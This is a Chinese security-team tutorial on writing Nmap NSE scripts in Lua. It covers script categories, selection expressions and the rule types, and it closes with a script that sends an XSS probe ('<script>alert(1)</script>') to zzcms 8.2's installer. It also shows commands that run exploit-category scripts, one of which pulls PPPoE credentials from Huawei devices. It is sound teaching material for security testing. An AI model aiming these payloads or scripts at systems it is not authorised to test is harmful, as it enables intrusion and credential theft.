Hr-Papers|Nmap 滲透測試腳本指南

2021-02-21 紅日安全

紅日安全團隊

團隊成員:yumu   博客:http://sec-redclub.com/team/

紅日安全已經成立兩年之多,團隊之所以發展,全靠一幫小夥伴共同維護成長,大家在團隊已經形成一種共享為榮的隊訓,每兩周周日進行專業知識分享,讓其它小夥伴也快速成長。內部有一些項目也在不斷在填補大家的空白。新的一年紅日需要一些新的血液來提高團隊發展,所以你懂得~~~

紅日Python安全工具小隊招人了!!!!  目前考慮招2--3人,如果你是大牛,你在團隊可以學習的更快,因為有比你的姿勢更好,讓你成長的更快。因為加入人數較多,提前申請我們會酌情考慮。(簡歷發送:sec-redclub@qq.com)

團隊簡歷模板下載:https://pan.baidu.com/s/1JUzq-VbCFh81BBGlEw8cuA

內部學習視頻洩露

Nmap腳本引擎(NSE)革新了Nmap的功能。它是在2007年的谷歌夏令營期間推出,雖然第一個腳本是針對服務和主機檢測,時至今天,已經存在有14個類別涵蓋廣泛的任務,從網絡發現到檢測和利用安全漏洞。既然我們深知NSE的強大,那我們肯定要好好利用它,那麼這篇文章我將引導大家走入NSE腳本的世界,時不我待,趕緊跟我一起行動吧。

shroot@kali:~# nmap -sV -sC scanme.nmap.org

上一個命令運行帶有操作  系統檢測 (-O)的SYN掃描,即  服務檢測(-sV),最重要的是NSE在(-sC)上。 -sC選項啟用NSE並在默認類別中運行任何腳本。 這組腳本被默認為是安全的,它不會執行任何可能會干擾在該服務上運行的服務的目標主機的操作。 但是,某些腳本執行可能引發的操作入侵檢測系統(IDS)和入侵防護系統(IPS)中的警報。

腳本分類

首先我們得了解腳本的分類信息,這樣我們才能更好地把我們自定義的腳本進行歸類利用。

腳本類別描述auth與用戶認證相關的NSE腳本broadcast使用廣播收集網絡信息brute暴力破解default默認,執行腳本(-sC)discovery與主機和服務發現相關的腳本dos與拒絕服務攻擊有關的腳本exploit用於利用安全漏洞的腳本external此類別適用於第三方服務的腳本fuzzerNSE腳本專注於模糊測試intrusive入侵腳本malware與惡意軟體檢測相關的腳本類別safe在所有情況下默認為是安全的腳本vuln與檢測和利用安全漏洞相關的腳本version高級系統腳本NSE腳本選擇

Nmap使用 —script選項進行腳本的選擇。 這個選項後面可以是一個腳本名稱,NSE類別,NSE文件的路徑,包含腳本的文件夾,甚至表達式。使用 —script通過腳本名稱或類別進行選擇腳本。Nmap選項會按名稱執行腳本。 執行時用逗號分隔幾個腳本:

直接加腳本名稱nmap --script http-title <target>nmap -p80 --script http-huawei-hg5xx-vuln <target>nmap --script http-title,http-methods <target>

以下屏幕截圖顯示了http-huawei-hg5xx-vuln腳本的輸出。 此腳本利用華為設備中的遠程漏洞進行檢索,檢索的信息包括PPPoE憑證和無線網絡安全配置:

要選擇整個類別,只需使用類別的名稱(請參閱腳本作為參數。 例如,要運行漏洞類別,使用以下命令:nmap --script exploit <target>您也可以用逗號分隔它們來運行多個類別:nmap --script discovery,intrusive <target>-sC選項僅僅是--script默認選項的別名。按文件名或文件夾選擇要執行NSE腳本文件,請使用以下命令:nmap --script /path/to/script.nse <target>與類別類似,可以通過分離路徑來執行多個腳本用逗號分隔:nmap --script /path/to/script.nse,/another/path/script2.nse <target>要執行文件夾中包含的所有腳本,只需要傳遞文件夾名稱舉個慄子:nmap --script/path/to/folder/ <target>nmap --script /custom-nse-scripts/ scanme.nmap.org

高級腳本選擇與表達式

表達式用於描述一組腳本。我們可以利用腳本選擇表達式的場景:•舉個慄子:(未利用表達式將匹配任何腳本)使用不屬於exploit類別的腳本:#nmap -sV --script "not exploit" <target>•或和運算符允許我們構造更複雜的表達式。以下表達式將匹配不在intrusive,或者dos,或者exploit類別中的任何腳本。#nmap --script "not(intrusive or dos or exploit)" -sV <target>•如果我們想要執行broadcast和discovery中的所有類別腳本。我們使用:#nmap --script "broadcast and discovery" < target>•甚至可以使用通配符*:#nmap --script "snmp- *" <target>•當然,我們可以結合使用通配符和表達式。例如:讓我們運行名稱以http-開頭的所有腳本,但排除http-slowloris,http-brute,http-form-fuzzer和http-enum腳本:#nmap --script "http-* and not(http-slowloris or http-brute orhttp-enum or http-form-fuzzer)" <target>下一個命令將執行以http開頭的但不在exploit類別中的所有腳本:#nmap --script「http- * not(exploit)」<target>

NSE腳本參數

—script-args 選項用於在NSE腳本中設置參數。

還是舉個慄子,設置http-title腳本的參數useragent,
使用這個表達式:

nmap -sV —script http-title —script-args http.useragent =「Mozilla 1337「

當然有時你也可以在忽略腳本名稱設置參數(以下兩條表達意思是一致的):

nmap -p80 —script http-trace —script-args path

nmap -p80 —script http-trace —script-args http-trace.path

如果你使用共享參數名稱的腳本,就必須避免參數衝突。例如下面中的uri參數,公用的時候要是需要進行額外的設置時就必須加上完整的腳本名稱,避免參數之間的衝突。

$ nmap --script http-majordomo2-dir-traversal,http-axis2-dir-traversal--script-args http-axis2-dir-traversal.uri = /axis2/,uri =/majordomo/ <target>$ nmap --script http-majordomo2-dir-traversal,http-axis2-dir-traversal--script-args uri = /axis2/,http-majordomo2-dir-traversal.uri = /majordomo/ <target>

語言準備

編寫NSE腳本我們需要有lua程式語言的基礎,可以回去自己學習一下。我這裡簡單列出編寫腳本之前必須了解的一些語法。其他的就自己回去學習吧。轉載於菜鳥教程:http://www.runoob.com/lua/lua-tutorial.html

Lua 特性

標示符Lua 標示符用於定義一個變量,函數獲取其他用戶定義的項。標示符以一個字母 A 到 Z 或 a 到 z 或下劃線 _ 開頭後加上0個或多個字母,下劃線,數字(0到9)。最好不要使用下劃線加大寫字母的標示符,因為Lua的保留字也是這樣的。
Lua 不允許使用特殊字符如 @, $, 和 % 來定義標示符。 Lua 是一個區分大小寫的程式語言。因此在 Lua 中 Runoob 與 runoob 是兩個不同的標示符。以下列出了一些正確的標示符:mohd         zara      abc     move_name    a_123myname50     _temp     j       a23b9        retVal
關鍵詞以下列出了 Lua 的保留關鍵字。保留關鍵字不能作為常量或變量或其他用戶自定義標示符:
and    break    do    elseelseif    end    false    forfunction    
if    in    localnil    not    or    repeatreturn    then    
true    untilwhile            
一般約定,以下劃線開頭連接一串大寫字母的名字(比如 _VERSION)被保留用於
Lua 內部全局變量Lua 數據類型Lua是動態類型語言,變量不要類型定義,只需要為變量賦值。
值可以存儲在變量中,作為參數傳遞或結果返回。Lua中有8個基本類型分別為:
nil、boolean、number、string、userdata、function、thread和table。數據類型    
描述
nil    
這個最簡單,只有值nil屬於該類,表示一個無效值(在條件表達式中相當於false)。
boolean    包含兩個值:false和true。number    表示雙精度類型的實浮點數
string    字符串由一對雙引號或單引號來表示
function    由 C 或 Lua 編寫的函數
userdata    表示任意存儲在變量中的C數據結構
thread    表示執行的獨立線路,用於執行協同程序
table    Lua 中的表(table)其實是一個"關聯數組"(associative arrays),
數組的索引可以是數字或者是字符串。在 Lua 裡,
table 的創建是通過"構造表達式"來完成,最簡單構造表達式是{},用來創建一個空表。
nil(空)nil 類型表示一種沒有任何有效值,它只有一個值 Lua 變量變量在使用前,必須在代碼中進行聲明,即創建該變量。編譯程序執行代碼之前編譯器需要知道如何給語句變量開闢存儲區,用於存儲變量的值。
Lua 變量有三種類型:全局變量、局部變量、表中的域。
Lua 中的變量全是全局變量,那怕是語句塊或是函數裡,除非用 local 顯式聲明為局部變量。局部變量的作用域為從聲明位置開始到所在語句塊結束。變量的默認值均為
nil。
a = 5              
local b = 5        
function joke()    c = 5              local d = 6     endjoke()print(c,d)          do    local a = 6        b = 6              print(a,b);     endprint(a,b)      執行以上實例輸出結果為:$ lua test.lua 5    nil6    65    6

了解NSE腳本的編寫規則Nmap的目錄結構

我們只需要簡單的了解一下它的結構即可,了解它的目錄結構是為了清楚Nse腳本存放的位置。這裡有幾個注意點:

1.編寫的腳本的後綴為nse

2.編寫之後的NSE腳本存放在script文件夾內,這樣腳本才可以生效

3.必須使用—script選項進行調用Nse腳本

NSE腳本的編寫流程

在書寫NSE腳本之前我們必須了解它的書寫步驟,為了方便大家理解,我把一個NSE腳本的書寫分為了四步。

1.導入腳本編寫所需庫

2.編寫腳本描述信息

3.確定Rule類型

4.編寫Action

可能此時你還有點蒙,沒關係,我們看一下圖思路就清晰了。

Namp nse 腳本模板結構如圖所示:

文章看到這裡大家肯定想接下來肯定要開始編寫NSE腳本了吧。還不行呢,我們先舉個幾個慄子來說說四個Rule類型的區別。

Rule的四種類型

Rule:用於描述腳本的觸發規則,返回值只有true和false兩種。返回值決定了後面action對應的函數是否執行,注意:true(執行),flase(不執行)。它有四種類型分別是Prerule,Hostrule,Portrule,Postrule。

下面的幾個慄子的環境為:

1.Window2.phpstudy3.nmap-7.64.zzcms8.2(對應zzcms.im)

基礎參數擴展

hosttable類型host.os作業系統信息host.iptagret(目標主機)對應的ip,例如下面的127.0.0.1host.nametagert在命令行對應的名字,例如下面的zzcms.imhost.targetname同上host.name,我個人是這樣認為的host.directly_connected判斷目標主機是否與本機在同一個子網host.mac_addrmac地址 (必須是同一子網的設備這個命令才有效)porttable類型port.number埠號port.protocol協議port.service服務 http或httpsport.version版本信息port.state埠狀態

Prerule

Prerule會在Namp沒有掃描之前進行觸發。

舉個慄子:我們新建一個prerule.nse文件,然後我們把它存放在script文件夾下。只要」RongRi AnQuan NSE script Prerule test」列印在Namp掃描之前,就可以證明Prerule會在Namp沒有掃描之前進行觸發。

description = [[Prerule test ]]

author = "HongRi yumu"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default","safe"}prerule = function(host,port)   return trueendaction = function(host, port)  return "RongRi AnQuan NSE script Prerule test"end

我們都知道在測試階段我們難免會出現錯誤,那假設我們出現了錯誤我們應該如何解決呢。這時我們需要藉助Nmap的調試模式進行調試。還是老規矩舉個慄子:那我這裡新建一個preruleDebug.nse文件讓它列印系統信息故意讓其出錯(至於為啥會出錯後面會解釋),然後調試一下給大家看。我們只需要加上-d選項即可進入調試模式,那一般我這邊是-d 3,3代表的是等級,等級越高,越詳細。-d 3列印的調試的信息已經足夠詳細了,所以我習慣選擇-d 3.

description = [[prerule test]]

author = "HongRi yumu"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default","safe"}prerule = function(host,port)   return trueend action = function(host, port)    return host.os

end

錯誤界面如圖所示:

調試模式如圖所示:

我們從圖中可以看到出錯原因是因為prerule threw an error!看到詳細原因是因為attempt to index a nil value (local 『host』)意思是說host是個無效值。原因是:我們知道prerule是在Nmap掃描之前觸髮腳本的。那也就是說我們是無法在action中列印出作業系統信息。好了,到這裡大家也應該知道如何調試錯誤了。

聽說,對比產生美

我們都知道對比產生美,那我們在這個錯誤的模板上改一下規則讓它變成hostrule,看看結果如何。

Hostrule

Hostrule會在Namp執行主機發現或探測進行觸發。

舉個慄子:新建一個hostrule.nse文件。複製上面preruleDebug.nse的代碼,但是做一點改動,就是Rule的類型改為Hostrule。然後運行能否列印我們想要的系統信息(嘻嘻,結果當然是成功列印啦)。

description = [[hostrule test]]author = "HongRi yumu"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default","safe"}hostrule = function(host,port)   return trueend action = function(host, port)    return host.os

end

Portrule

Portrule會在Namp執行埠掃描時觸髮腳本。

舉個慄子:新建portrule.nse文件,代碼如下,然後我們掃描幾個埠然後看看是否在掃描埠的時候列印出「Hongri Anquan yumu」和host.ip。

local stdnse = require "stdnse"local table = require "table"description = [[portrule test]]author = "HongRi yumu"license = "Same as Nmap--See http://nmap.org/book/man-legal.html"categories = {"default","safe"}portrule = function(host,port)   return port.protocol == "tcp" and port.state == "open"endfunction action(host,port)    local table_input = {}    local user = "Hongri Anquan yumu"    table.insert(table_input,host.ip)    table.insert(table_input,string.format("From: %s", user))    return stdnse.format_output(true, table_input)        end

結果如下:

再舉一個慄子:小試牛刀,我們寫一個Nse腳本來獲取zzcms8.2網站上的客服電話號碼。

參數知識擴展

http庫get()發起get請求,請求結果以一個table的形式返回host要請求的主機path要檢索的路徑options可選,允許調用者控制socket,請求頭的tableport要檢索的埠

post()發起post請求,請求結果以一個table的形式返回ignored向後兼用,一般填寫nil,忽略即可postdatapost數據,字符串或者table格式host要請求的主機path要檢索的路徑options可選,允許調用者控制socket,請求頭,超時時間的tableport要檢索的埠

注意小細節

local stdnse = require "stdnse"local table = require "table"local shortport = require "shortport"local http = require "http"local string = require "string"description = [[Get the phone number of the customer service]]author = "HongRi yumu"license = "Same as Nmap--See http://nmap.org/book/man-legal.html"categories = {"default","safe"}portrule = shortport.httpfunction action(host,port)    local telephone_number,baseurl    baseurl = "/"    response = http.get(host,port,baseurl)    telephone_number = string.match(response.body,"%d+-%d+")    if  telephone_number ~= nil    then        return "consumer hotline:"..telephone_number    else        return "Hongri Auquan"    end    end

Postrule

Portrule會在Namp結束時觸髮腳本,通常用於掃描結果的數據提取和整理。

舉個慄子:  觸發時候列印」Hongri Anquan test postrule」

description = [[postrule test]]author = "HongRi yumu"license = "Same as Nmap--See http://nmap.org/book/man-legal.html"categories = {"default","safe"}postrule = function(host,port)   return trueend action = function(host, port)    return "Hongri Anquan test postrule"end

初出茅廬,實戰編寫腳本探測zzcms8.2 反射型XSS

需要詳細zzcms8.2代碼審計的內容請到:https://bbs.ichunqiu.com/thread-36147-1-1.html

那我這裡本地搭建了環境,然後我先簡單使用火狐測試一下是否存在反射型xss。廢話不說,打字累人,看操作。

嗯,只要玩過web滲透的都應該知道此時源碼當中肯定插入了,這點必須清楚,因為這是我們後面編寫Nse腳本思路。

好。我們來看看圖,確定編寫思路。

看完四步的你應該很清晰如何編寫我們的腳本了,那就開幹吧。我這裡新建一個zzcmsxss.nse,代碼如下:

local http = require "http"local shortport = require "shortport"local string = require "string"local stdnse = require "stdnse"local table = require "table"description = [[Detecting the presence of reflective xss in zzcms8.2]]author = "HongRi yumu"license = "Same as Nmap--See http://nmap.org/book/man-legal.html"categories = {"default","safe","discovery","version"}portrule = function(host,port)   return port.protocol == "tcp" and port.state == "open"endlocal FLAG = "alert"action = function(host, port)   print("port.numner is : ",port.number)   print("port status is : ",port.state)   local table_input = {}   local xss_exit = "Reflective xss exists"   local xss_not_exit = "Reflective xss does not exist"   local basepath = stdnse.get_script_args(SCRIPT_NAME .. ".url-path") or '/install/index.php'   local options={headers = {   ["Accept"]="text/html,application/xhtml+xm…plication/xml;q=0.9,*/*;q=0.8",   ["Accept-Language"]="zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",   ["Accept-Encoding"]="gzip, deflate",   ["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; W…) Gecko/20100101 Firefox/58.0",   ["Host"] = host.name,   ["Referer"]="http://".. host.name .."/install/index.php",   ["Content-Type"]="application/x-www-form-urlencoded",   ["Connection"]="Keep-alive",   ["Content-length"]=76,   ["Upgrade-Insecure-Requests"]=1,   } }   local postdata = {    ["admin"]="admin",    ["adminpwdtrue"]="admin<script>alert(1)</script>",    ["step"]=6   }   local response= http.post(host,port,basepath,options,nil,postdata)     if response.status and response.body   then    if response.status == 200 and string.find(response.body,FLAG) ~= nil      then      table.insert(table_input,string.format("Final Results: %s",xss_exit))        return stdnse.format_output(true, table_input)    else      table.insert(table_input,string.format("Final Results: %s",xss_not_exit))        return stdnse.format_output(true, table_input)    end   endend

結果如下(保存有xml的輸出格式):

相關焦點

  • 滲透測試對客戶網站的前提準備事項
    對於客戶的滲透測試來說,在進行前與用戶溝通某些有關事項是非常必要的:首先是滲透測試的目的:用戶這次的需求是什麼?等待保險、日常安全檢查或者其他目的,不同的目的決定了不同的漏洞評估等級,在測試過程中也感受到不同的方法。
  • nmap掃描在線主機的幾種方法
    nmap是滲透測試中最重要的神器之一。通過nmap掃描我們可以知道當前主機或者伺服器開啟了那些埠。通過開啟的埠,便可進行下一步的滲透測試。當然,利用nmap我們可以掃面當前區域網中在線的設備。分析區域網中設備的安全性。
  • 「首席架構師推薦」精選的滲透測試資源,工具和其他(3)
    Decker -穿透測試編制和自動化框架,它允許編寫聲明性的、可重用的配置,能夠吸收變量,並將運行的工具的輸出作為其他工具的輸入。Faraday 法拉第-多用戶集成pentest環境的紅色團隊執行合作滲透測試,安全審計,和風險評估。
  • Windows滲透測試工具CommandoVM安裝使用教程
    2019年3月28日,火眼發布了一個包含超過140個開源Windows滲透工具包含140個滲透工具,紅隊滲透測試員和藍隊防禦人員均擁有了頂級偵察與漏洞利用程序集。該工具集名為「CommandoVM」.火眼旗下麥迪安網絡安全公司顧問以及Commando VM套件的聯合創建者 Jake Barteaux 表示:在進行內部滲透測試時,我身邊的大部分滲透測試工程師都會先自行配置一個Windows測試環境。能不能把這個環境配置好,配得有多快,已然成為了衡量滲透測試工程師手藝高低的標準了。
  • 內網滲透|ATT&CK紅隊評估實戰靶場-1
    介紹一下:此靶場紅日安全團隊紅隊評估實戰靶場第一關,難度不大,多種姿勢均可獲得域控權限,是練習域滲透各種姿勢很不錯的靶場,搭建方式也非常簡單,配置一下win7為雙網卡,橋接為模擬外網ip,nat模擬內網域環境。配置完雙網卡即可,dhcp方式獲取橋接ip。勿管nat網卡的ip,內網域環境已經搭建好了。
  • 網絡全工具Nmap是什麼?有什麼常見命令
    正如大多數被用於網絡安全的工具,nmap也是不少黑客及駭客(又稱腳本小子)愛用的工具。系統管理員可以利用nmap來探測工作環境中未經批准使用的伺服器,但是黑客會利用nmap來搜集目標電腦的網絡設定,從而計劃攻擊的方法。儘管非技術性高管人員偶爾會抱怨在埠掃描企業,但nmap本身是完全合法的,就像是敲附近每個人的家門來查看是否有人在家。
  • 深圳平安科技滲透測試工程師面試分享
    帶來的分享~ 所面試的公司:平安科技 薪資待遇:12k,13-16薪、雙休、不便透露 所在城市:深圳 面試職位:滲透測試工程師
  • 通過滲透測試服務來解決網站被黑客攻擊
    APP滲透測試目前包含了Android端+IOS端的漏洞檢測與安全測試,前段時間某金融客戶的APP被黑客惡意攻擊,導致APP裡的用戶數據包括平臺裡的帳號,密碼,手機號,姓名都被信息洩露,通過老客戶的介紹找到我們SINE安全公司尋求安全防護上的技術支持,防止後期APP被攻擊以及數據篡改洩露等安全問題的發生
  • 關於網站滲透測試的重要性
    有部分用戶雖然知道網站滲透測試的存在,但是不太清楚網站滲透測試的重要性,今天小編就來講解下關於網站滲透測試的重要性。想要知道關於網站滲透測試的重要性,就需要先了解網站的組成以及網站漏洞可能引發的問題。3、網站滲透測試的優勢網站滲透測試的目的在於,模擬攻擊者對網站進行全面檢測和評估,在攻擊者之前找到漏洞並且進行修復,從而杜絕網站信息外洩等不安全事件。測試、檢查、模擬入侵就是滲透測試。滲透測試能夠通過識別安全問題來幫助一個單位理解當前的安全狀況,這使促使用戶開發操作規劃來減少攻擊或誤用的威脅。
  • web滲透測試對信息收集的方法介紹
    什麼是web滲透測試?一般是指通過模擬黑客的攻擊手法,對計算機網絡系統進行安全評估測試,如果發現系統中存在漏洞,向被測試系統的所有者提交滲透報告,並提出補救措施。這一章將通過滲透測試Web應用和伺服器,向大家介紹滲透測試的方法和技巧。
  • 新年願望之學習網站滲透測試
    這篇文章面向入門的同學,更偏向於學習的方法,而非滲透的技巧,請看準需求再往下讀。我是SINESAFE網站安全公司的技術,水平有限,所以自然親民,和很多滲透測試新手都很熟。他們中的大多數都是大學生,還有很多年的工作,但一直對網絡安全保持著熱情。很多同學都很努力,但怎麼也找不到一條通順的道路,順利地入門成長。
  • 包嗅探—滲透測試人員專用工具
    我們的理解是Scapy可以用作nmap,arpspoof,tcpdump,p0f等其他工具的替代品。  Scapy是免費的嗎?  是的,Scapy是免費的。  Scapy是否適用於所有作業系統? Scapy與Linux,Windows和MAC OS X作業系統兼容。
  • 網站漏掃服務換個思路提高滲透測試效率
    在滲透測試過程中,我們可以通過插件識別類型後,使用漏洞腳本對特定系統進行模糊。在這裡,筆者將與大家分享漏洞POC驗證系統的設計和研究思路。在系統開發之初,選用了分布式平臺設計架構。後來因為考慮到與分布式資產掃描平臺兼容的接口,最後理解了耦合機制,徹底變成了單機版。
  • 滲透測試工程師的崗位要求
    滲透測試工程師崗位要求崗位要求:1.熟練掌握逆向工程、漏洞挖掘,具備一定的漏洞挖掘經驗2.熟練掌握二進位相關的漏洞攻防內容3.熟悉智能硬體中常見無線通訊協議,如 BLE/RF/NFC/ZigBee 等,並可對其進行安全分析及調試4.在web安全、內網滲透、pwn、逆向工程、密碼學等至少其中一個方向有深入研究;5.至少掌握一門程式語言,如 C/C++/Python/Perl/Lua 等,可獨立完成漏洞利用的開發
  • Java在網站滲透測試中的漏洞分析
    為什麼在被實戰滲透中的網站大部分是PHP代碼開發設計的?這個問題可以先放一放,先說下邊的這幾個問題。1.為何看了許多分享實戰中的案例全是PHP代碼開發設計的網站?不清楚網友說的實例指具體的滲透實例還是一些實驗教學實例?
  • 白帽子黑客教你:Kali Linux滲透測試與Metasploit攻防基礎
    它允許使用者開發自己的漏洞腳本,從而進行測試。Metasploit提供了大量的模塊。當用戶希望快速找到針對某漏洞模塊時,則可以使用search命令進行搜索。搜索模塊時,用戶可以指定搜索類型、CVE ID、發布時間等,如search cve:2009 type:exploit。為了方便用戶搜索模塊,可以使用help search命令查看所有支持的過濾器。
  • 「首席架構師推薦」精選的滲透測試資源,工具和其他(4)
    Lambda-Proxy用於測試AWS Lambda無伺服器函數上的SQL注入漏洞的實用程序。MITMf -中間人攻擊的框架。Morpheus 自動ettercap TCP/IP劫持工具。mitmproxy為滲透測試人員和軟體開發人員提供交互式的支持tls的HTTP代理攔截。oregano Python模塊,作為中間機器(MITM)運行,接受Tor客戶機請求。
  • 證監會發布實施《證券期貨業軟體測試指南 軟體安全測試》等三項...
    近日,證監會發布《證券期貨業軟體測試指南 軟體安全測試》《證券期貨業移動網際網路應用程式安全規範》《證券期貨業於銀行間業務數據交換協議 第1部分:三方存管、銀期轉帳和結售匯業務》等三項金融行業標準,自公布之日起施行。